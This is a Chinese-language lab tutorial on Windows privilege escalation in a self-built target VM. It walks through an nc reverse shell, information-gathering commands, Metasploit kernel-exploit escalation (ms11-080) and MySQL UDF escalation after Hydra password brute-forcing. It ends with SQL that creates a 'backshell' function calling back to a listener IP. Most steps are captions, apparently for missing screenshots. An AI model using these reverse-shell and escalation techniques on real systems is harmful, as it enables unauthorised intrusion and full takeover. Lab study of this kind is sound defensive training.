以下所有的操作都是在靶机环境中进行学习展示,对他人操作系统进行破坏会依法进行制裁!!!
提高自己在服务器中权限(主要针对在网站入侵过程中,通过各种漏洞获得最高权限的操作过程)
Tips:如有其它的靶机环境,这部分可以略过
网上本来想找一些环境供大家进行练习,没有找到合适的虚拟机,这里就自己搭建一个吧!
》》将windows2008R2镜像copy到机子上并进行在虚拟机中准备安装
》》开启虚拟机,等待安装完成
》》等待VMware Tools安装
》》等待重新启动(键入安装时的密码)
Tips:以下的所有命令都是在模仿管理员的操作!
》打开安全策略(secpol.msc),修改如下策略:
》》添加成功,并查看当前用户
》》用户权限展示(标准用户)
》》切换到Kevin用户
场景构建:此场景信息收集在于拿到了一个服务器shell,在低权限账户下的信息收集操作(这里为了方便演示我们可以使用nc反弹一个shell)
》》kali监听:
》》受害者执行
》》kali获得shell
主要是一些windows上的cmd命令使用
方法一:(利用不同操作系统命令判断,输入linux命令不能执行则目标系统为windows)
Tips:我们可以根据windows和linux特性:一直ping则判断是linux,发送4个数据包则是windows(这里借用下同事曾经的经验)
》》通过at命令查看当前权限
(Tips:系统权限下才能执行at/schtask)
》》在注册表中获取详细的安装软件信息
reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall reg.txt
find "DisplayName" reg.txt |find /V "ParentDisplayName" > tmplist.txt
关于wmic后渗透命令会在后边进行详细阐述!
情景提示:现在我们有一个普通用户的shell,并成功在目标机子上运行了msf生成的载荷文件,操作方法可参考:Windows系统后门之exe文件
》》将Meterpreter当前会话切换至后台
(通过B查看的系统补丁,这里随便用一个未打的系统补丁进行测试)
》》搜索ms11-080
(AfdJoinLeaf特权升级)
》》使用此漏洞进行提权
》》查看配置参数,设置session即可
》》告诉我们不支持64位系统运行攻击,这里具体还需要参考gthub上系统移除漏洞提权汇总:https://github.com/SecWiki/windows-kernel-exploits
》》这里我们直接使用ms18-8120
》》成功获取最高权限
原理:
本质上也是一种udf提权,利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限
问题:
攻击过程指:探测到数据库可远程连接且对数据库密码进行获取的过程
》》Nmap探测目的端口是否开放了mysql服务(已开放)
》》测试是否开启远程链接远程连接
方法一: 远程检查是否允许远程连接(返回如下不允许连接):
方法二: 使用客户端管理软件连接试探(返回如下则不允许远程连接):
方法二: Hydra 远程爆破,显示如下则不允许远程连接
》》这里为了演示提权方法,先允许数据库远程连接,操作请参考:Mysql开启远程连接
》》使用hydra爆破到msyql的密码(略)
》》远程连接到对方的mysql
》》创建函数backshell
CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll';
select backshell("监听主机IP",2020);